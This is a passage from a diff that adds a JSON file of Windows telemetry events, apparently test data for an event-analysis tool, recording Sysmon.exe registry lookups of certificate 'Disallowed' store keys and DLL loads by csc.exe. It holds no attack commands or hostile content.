"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": 
"Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570858869984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570858869984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570858869984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570858869984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570858869984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570858869984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570858869984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570858869984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570858869984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570858869984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570858869984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570858869984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570858869984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570858869984, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570858869984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570858869984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570858869984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570858869984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "wow64win.dll", + "image_path": "C:\\Windows\\System32\\wow64win.dll", + "pid": 3592, + "process_name": "csc.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", + "timestamp": 
131883570858550000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00107B224D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570858869984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570859020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570859020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570859020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + 
"registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570859020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570859020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570859020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570859020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": 
"CRLs", + "timestamp": 131883570859020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570859020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570859020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570859020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570859020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + 
"registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570859020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570859020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570859020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570859020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570859020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": 
"Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570859020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570859020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570859020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570859020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570859020000, + 
"unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570859020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\SysWOW64\\kernel32.dll", + "pid": 3592, + "process_name": "csc.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", + "timestamp": 131883570858710000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00107B224D01}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\SysWOW64\\kernel32.dll", + "pid": 3592, + "process_name": "csc.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", + "timestamp": 131883570858710000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00107B224D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570859020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + 
"timestamp": 131883570859180000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570859180000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570859180000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570859180000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570859180000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570859180000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570859180000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570859180000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570859180000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 
131883570859180000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570859180000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570859180000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570859180000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570859180000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570859180000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570859180000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570859180000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570859180000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 